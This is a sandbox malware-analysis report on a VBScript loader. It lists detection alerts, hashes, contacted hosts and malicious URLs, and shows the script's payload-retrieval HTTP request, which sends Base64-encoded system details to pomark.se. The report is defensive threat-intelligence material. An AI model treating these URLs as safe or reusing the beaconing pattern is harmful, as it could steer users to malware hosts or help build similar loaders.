MSG_956133.vbs
This report is generated from a file or URL submitted to this webservice on March 26th 2020 13:59:56 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 2 domains and 2 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 4
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 8/58 Antivirus vendors marked sample as malicious (13% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "93.188.2.54": ...
URL: http://preduzetnik.rs/yn.php (AV positives: 4/76 scanned on 03/26/2020 12:11:37)
URL: http://pomark.se/staple/444444.png?uid= (AV positives: 4/76 scanned on 03/26/2020 11:27:31)
URL: http://etnoselozabran.com/wp-content/zon/6c962/ (AV positives: 10/77 scanned on 03/26/2020 09:53:20)
URL: http://pomark.se/staple/444444.png (AV positives: 3/76 scanned on 03/26/2020 07:24:10)
URL: http://pomark.se/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA (AV positives: 3/76 scanned on 03/26/2020 05:16:03)
File SHA256: d693ce7da73265528dde42b0156ed49b211948280e0e491ec29497cb15d1a888 (Date: 03/26/2020 14:01:08)
File SHA256: 0747701b08bc3d938a7db4a9701fe890edee079754e6834a50e6ba527b6ff7a1 (Date: 03/26/2020 07:31:13)
File SHA256: 467f47fe321a4193b0b6905859ee531cf004e40215e46ee71cd48dfb09665616 (Date: 03/26/2020 01:08:41)
File SHA256: 84ee7aa75c401165805f6b4287899e3e927508a506dc06988d5635992353754f (Date: 03/26/2020 00:00:48)
File SHA256: 8ff299861c6ab8629f2a9847f5601b04d55793dc700ee8f7acf180e4867fcc44 (AV positives: 19/75 scanned on 03/12/2020 00:01:54)
File SHA256: 1f53e1dceb9258f32ec006d2b5979a58c6dcae6d4180ae479153012445556f76 (AV positives: 5/74 scanned on 02/25/2020 08:49:32)
File SHA256: 1231c8558192c1026719db86077f3b58b0a4ebbe5082311662cecb0ba6f32745 (AV positives: 4/75 scanned on 02/24/2020 21:52:27)
File SHA256: 6453f127994ce0b3dc52dc02bbe19096e05aa9299bec2a1e584f1fc2057250a5 (AV positives: 28/74 scanned on 02/07/2020 05:19:01)
File SHA256: 399a27b146613d522ca9430ba24215a193a64f816304e4f51615250d98c3294b (Date: 01/15/2020 13:26:36)
File SHA256: aa8382efb85b68185d7dcf13ecbbe6acf1df7ad3a7c1b0b68d9b59a91a9e185c (AV positives: 3/72 scanned on 01/13/2020 19:07:30) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 6
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
-
"ght omnidistance enjoyer Euthamia Hussey scabrin Grimstead moccasins Cyra fulfiller unflatteringly Priddy uncondescension archtreasurer cosmolabe saltfat sleepwalks gamgee lacking desirous resprays alula squam orpiments contenders nonalkaloid aerophilately posttussive apprentices syrt resaws quasi-humanly pictureless actinodromous towing pools playstead jatrophic Neomah sonnetization forthbrought noneruptive Batumi thruster libertarianism undiscoursed cratemaking quarterstetch ponderability saccharinity Braham perlocutionary Exod. geekier semiprofaneness overpermissive Buchanite Helenwood hematherm goliaths spirit-stricken palliating ill-regulated argh speckledness Russophilism energiatye sickliness pill-taking preinspect self-binding bodger
OPWbcrVvuqgZUJUfIKQetGVMmlea.type=jTrekdZFSXoHoOhgPykaBeFdSFsq'swoun minisurvey existentialist Zephyr gravel unlocker larviparous zooks Dorask gullied elderwoman moter Peshastin royalistic double-ported upflare lauan shadeless red-cheeked tsooris hemicentrum crumpet jee" (Indicator: "ntice")
"leucemias Schizotrypanum nascency overwhipped misdetermine vestrymen paleozoological subganger large-mindedly torrentuous molluskan maharao integration lurdane spoonwise anticensoriously water-standing whole-souledly semiextinct supportive reassimilating blushfulness unallusively latitudinary overcleanly endover provenience Pecopteris democrats tenostosis Pittosporum earth-fed" (Indicator: "ntice")
"ion lasket micrographs gashing abatic cachinnator cirrocumulous fifer pentoxide admonishments Lucilia Barnes unperspirable depreciator chowchow dibromoacetaldehyde grignet Nimrodize sublenticular
'Derian picked undissenting recoast stigmatypy nidifugous forded hyperflexible humorsomeness geotectology remaindermen quack-quack Isabea Adessenarian tautopodic witchet overcap pentose pleiobar heptagynia iron-nerved uprears rabble-roused nuttily Rhode unobesely schappes abl. loudliest libard Sabina loli lenticels civil-law syncarpy teeters trinomiality ameban Junius divulgers arborean stern-chase Benn Mel copolymeric tollers pristanes quinolin meshuga assimulate crop-headed Settle propublication digging boyfriend Topsham Sisyphian venerator antimonarchal asparagus Merrifield yearbook flyspecked unthrushlike tamaris zapupe ovatocylindraceous Welsh-speaking giobertite overintensity MRTS unrecountable transilluminated labefying predesirous semicomic noble-visaged Rileyville convictfishes voluminously unretracted hagg" (Indicator: "ntice")
"rchy heredolues trucing impatronize Ido camote tetrabasic prendre collodion theropod quasi-favourable ponticello preeliminating incongruence unknowen resiniferous adornments monumentalized scopulae overdepending now-a-days pluralism dully Boeotic excruciation foreseer Aguadulce bushpig sur- twice-prevented" (Indicator: "ntice")
"ountre- tollery ultraindifferent tabularisation nematicide catacrotism Vidal Troubetzkoy pentice biliation nonflammatory Ines icicled locomotives praseodidymium aperispermic Amo long-stalked intonaco nonarticulate sutten sautoires zygotes antesternal presymphysial saponacity gossipdom Bellinzona embowelled hypnogia Teufel docksides PX perisinuitis 'stiacciato delictus unspiritually mortacious lifeless intendance walkouts dreamery piroplasms Tano deflagrability dolous inflammabilities double-ditched myotrophy soft-cored valedictions lacinulose copperproof monastery Pro-prussian ghatwal semipendent uncalled religious-mindedness weapons objectionableness affixion piggie Kerman acridane womanishness Kattie woodblocks fault-finding metricates chalot orderer sutlerage hominess tylose ovolos hypertensinase ruffian compensator manumit rory-cum-tory corkers coprecipitated overzealous Dailamite connexion krone Abigale particularity caracoled cordwain antireforming stickadore unvenom unbodily nonbenevolent guirlande kni" (Indicator: "ntice") - source
- File/Memory
- relevance
- 2/10
-
Possibly checks for known debuggers/analysis tools
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO TLS Handshake Failure" (SID: 2029340, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/71 reputation engines marked "http://closed.loopia.com" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_956133.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73780000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 00900000 - source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes a visual basic script
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 93.188.2.54 on port 80 is sent without HTTP header
TCP traffic to 93.188.1.220 on port 443 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
-
Informative 11
-
General
-
Contacts domains
- details
-
"pomark.se"
"closed.loopia.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"93.188.2.54:80"
"93.188.1.220:443" - source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 6B340000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ... - source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "TaskScheduler class" (Path: "HKCU\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TREATAS") - source
- Registry Access
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\System32\taskschd.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"wscript.exe" touched file "C:\Windows\System32\WScript.exe.config" - source
- API Call
- relevance
- 7/10
-
Touches files in the Windows directory
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "pomark.se"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: SonyHD
Host: pomark.se"
Heuristic match: "closed.loopia.com" - source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132 (Show technique in the MITRE ATT&CK™ matrix)
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"VeqvEDpGYsTQHOgHQPBJdc=VeqvEDpGYsTQHOgHQPBJdc+UWsqsrAwTFJVuLUpsyWVSNfXyP
'a-twitter physocarpous farmwife indicativeness vinicultural preelectrically crystallised Cittticano Taeniata aspide hypothalli neurosal Bulimus prereckoning perstringe undersense misappropriating scraggle orbicle Wisacky rapscallionly malouah retreating horse-guard Acrasiales embolomycotic Castleford Konstantin minicomponent unfetters semilimber Trochosphaerida prostatorrhea insimplicity crotons undiurnally multiradial flyproof kakotopia stamnoi cells patellar stomatomalacia ordains cormel driftingly Camponotus re-mark cycloses capsulation studied voicefulness Donalsonville clingers Novanglian frostation unsquelched bidarkas Agnese preobvious pre-German viceregents BIND theoretically Parrott untactile Bjneborg ten-dollar hwt decanes propitiates Kayasth eyeletted latrines ascendingly tubuliporoid household-stuff re-escort noyau karyolitic ookinetic Currie doctorfishes interlisp dysautonomia Radburn warlikely piner controvertible micri" (Indicator: "twitter")
"'Naassenes tk c.m. abstergent nonsuspension Neogene Cuzzart turbiths Norway electrodialyze gasolenes atmograph majolicas outhumors hieromartyr nonenlightened filos heal-all cardioclasis Barmecide Rebersburg amorphophyte twin-jet strafing huloist comboy Golgotha stainproof conicality interneuronic crackpot tiger-passioned Herero egophony timariot by-the-way probattleship bluecup Nuneaton true-grained coilsmith Dolichosauria seminormal apprehender puffer acromegalia mininations kashered rectors paediatrician iconographer Chilognatha sprayfully foregallery wullcat registrational urediniospore antelation recitationist nonvolatilized sacrilegiously wide-breasted delphocurarine Derek squinched unhistoric hippotomist dowsed blotching Asterospondyli Gravenstein Benedicta nonacquaintanceship Keeler eluvies Argentino vinic signorinas Luigino misalignment fordless adventurement unbreech twitteringly D/P triple-tailed defamatory Cichorium orneriness amid- reticulatovenose hydropositive otic tardamente Plesiosauria per" (Indicator: "twitter")
"boxings Stalder iconism tubik biriani jawbreak purpurin wrapround wartier snowlands telegrapheme Makaraka excusers gunmaking beclamors uropodous unkenned proletariat conoidal wastiest adipomatous cameline punctuated oakberry unnameableness besonnet citrins likings rushes unaggressively dodipole misrepresentations half-truth undermoral Delamare uplifters playgoers decanted Pronaus nabe boorishly hungar
'predatoriness philosophilous French salpingostenochoria Niepce macroprosopia archdeaconess dimorphous Jermain sirenians twae-three bow-windowed lymphocytic fire-boot lizards nostochine skin-clad immunoreaction untransitorily splotchy Shaikh remixture Rozanna aeolsklavier extrarenal yokeable ridiculer large-bodied Huichou atrophy unmeretricious belonger Chellean Brailled pulchrify Sub-christian voyagings civilising Humorum emblazoner blink uncondensed nondependance tetrahedron oocyte currantworm curialistic nonperjuries twitterer hyalolith eviscerates Methody bullbaiting wine preterseasonable etiophyllin preind" (Indicator: "twitter") - source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Creates or modifies windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "778f79b3" to virtual address "0x6DB21FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "fae62d77e1a632772e713277ee29327785e22d776da0327726e42d77d16d3277003d3077804b307700000000ad3751758b2d5175b641517500000000" to virtual address "0x74661000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "c04e307720543177e0653177b53832770000000000d0c97500000000c5eac9750000000088eac97500000000e968337582283277ee29327700000000d2693375000000007dbbc9750000000009be337500000000ba18c97500000000" to virtual address "0x760F1000" (part of module "NSI.DLL")
"wscript.exe" wrote bytes "e7392e77e1a632772e713277ee29327785e22d776da03277906431773ad5387726e42d77d16d3277003d3077804b307700000000ad3751758b2d5175b641517500000000" to virtual address "0x74B91000" (part of module "WSHIP6.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
MSG_956133.vbs
- Filename
- MSG_956133.vbs
- Size
- 949KiB (971892 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- 0747701b08bc3d938a7db4a9701fe890edee079754e6834a50e6ba527b6ff7a1
- MD5
- 975b6b36cd771e5e34c0f14a5d5dccb2
- SHA1
- ed6dfa8ae74a039d5e813e21b0c7bf15b973d5f0
- ssdeep
- 12288:KOCkANly9B96o+I8rH/XS7TVfRoNL8tUA5GBTdWtT+AIbHHvg:KOGQ9B9n+IkfXSl+NL8tUEyWt+AQPg
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total.
- wscript.exe "C:\MSG_956133.vbs" (PID: 1008)
Network Analysis
DNS Requests
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
93.188.2.54 |
80
TCP |
wscript.exe PID: 1008 |
Sweden |
93.188.1.220 |
443
TCP |
wscript.exe PID: 1008 |
Sweden |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
93.188.2.54:80 (pomark.se) | GET | pomark.se/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: SonyHD
Host: pomark.se More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
93.188.1.220 -> local:50241 (TCP) | Potentially Bad Traffic | ET INFO TLS Handshake Failure | 2029340 |
local -> 93.188.2.54:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report